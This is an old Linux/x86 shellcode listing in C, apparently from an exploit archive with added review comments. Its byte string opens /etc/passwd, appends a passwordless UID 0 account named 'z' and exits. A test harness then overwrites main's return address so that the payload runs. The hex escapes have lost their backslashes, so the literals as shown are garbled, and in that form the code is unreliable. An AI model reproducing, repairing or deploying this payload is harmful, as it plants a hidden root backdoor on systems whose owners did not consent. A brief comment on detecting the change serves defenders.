# Title : linux/x86 add user 70 bytes
# Published : 2000-08-07
# Author : n/a
/*
* Linux/x86
*
* Appends the line "z::0:0:::\n" to /etc/passwd, i.e. a record for an
* account named "z" with an empty password field and UID 0 / GID 0.
* (quite old, could be optimized further)
*/
#include <stdio.h>
/*
 * c0de: byte string meant to hold 32-bit Linux/x86 machine code followed by
 * its own data (a path, one placeholder byte, and a passwd record).
 *
 * NOTE(review): as rendered on this page the hex escapes have lost their
 * backslashes ("xebx29" rather than "\xeb\x29"), so these literals are plain
 * ASCII text. The per-line comments describe the intended instructions, not
 * the bytes a compiler would produce from this listing.
 *
 * Intended behaviour, per the instruction comments:
 *   open("/etc/passwd", 0x401, 0x1b6)  - 0x401 is O_WRONLY|O_APPEND on
 *                                        Linux/x86, 0x1b6 is mode 0666
 *   write(fd, <passwd record>, 0x0a)
 *   exit(<whatever is left in %ebx>)
 * using the i386 int $0x80 syscall numbers 5 (open), 4 (write), 1 (exit).
 * No return value is checked between the calls.
 *
 * Defender's view: the only lasting effect is one appended /etc/passwd
 * record with an empty password field and UID/GID 0. File-integrity
 * monitoring or an audit watch on writes to /etc/passwd, plus a routine
 * check for additional UID 0 accounts and empty password fields, surfaces it.
 */
char c0de[] =
/* main: */
"xebx29" /* jmp callz: skip forward to the call so the data address can be recovered */
/* start: */
"x5e" /* popl %esi: return address pushed by the call = address of the DATA area */
"x29xc0" /* subl %eax, %eax: zero %eax */
"x88x46x0b" /* movb %al, 0x0b(%esi): store a zero byte at DATA+11, the placeholder right after the 11-character path */
"x89xf3" /* movl %esi, %ebx: first syscall argument = path */
"x66xb9x01x04" /* movw $0x401, %cx: second argument = open flags */
"x66xbaxb6x01" /* movw $0x1b6, %dx: third argument = creation mode */
"xb0x05" /* movb $0x05, %al: syscall 5 (open) */
"xcdx80" /* int $0x80 */
"x93" /* xchgl %eax, %ebx: open's return value becomes the first argument of the next call */
"x29xc0" /* subl %eax, %eax: zero %eax */
"x29xd2" /* subl %edx, %edx: zero %edx */
"xb0x04" /* movb $0x04, %al: syscall 4 (write) */
"x89xf1" /* movl %esi, %ecx: start from the DATA address ... */
"x80xc1x0c" /* addb $0x0c, %cl: ... and advance 12 bytes, past path and placeholder, to the record */
"xb2x0a" /* movb $0x0a, %dl: length = 10 bytes */
"xcdx80" /* int $0x80 */
"x29xc0" /* subl %eax, %eax: zero %eax */
"x40" /* incl %eax: syscall 1 (exit) */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8xd2xffxffxff" /* call start: pushes the address of the bytes that follow (the DATA area) */
/* DATA */
"/etc/passwd" /* path argument, 11 characters */
"xff" /* placeholder byte, overwritten with zero at run time to terminate the path */
"z::0:0:::n"; /* passwd record; NOTE(review): the final "n" was presumably "\n" before extraction */
/*
 * Test harness for c0de. Prints strlen(c0de), then writes the address of
 * c0de into the int-sized slot two ints above the local `ret`.
 *
 * NOTE(review): presumably that slot is main's saved return address under the
 * 32-bit x86 frame layout this was written for, so that returning from main
 * transfers control into c0de -- confirm. The C standard leaves this write
 * undefined, and its effect depends on compiler, flags and stack protection.
 * c0de is an ordinary writable global, so a non-executable data mapping
 * (NX / W^X) would be expected to fault on the transfer.
 *
 * NOTE(review): strlen() is called without <string.h>, its size_t result is
 * printed with %d, main relies on implicit int and has no return statement,
 * and (int)c0de truncates the pointer wherever pointers are wider than int.
 * The "n" ending the format string was presumably "\n" before extraction.
 */
main() {
int *ret;
/* Point ret two ints above its own stack slot. */
ret=(int *)&ret +2;
printf("Shellcode lenght=%dn",strlen(c0de));
/* Overwrite that slot with the address of c0de. */
(*ret) = (int)c0de;
}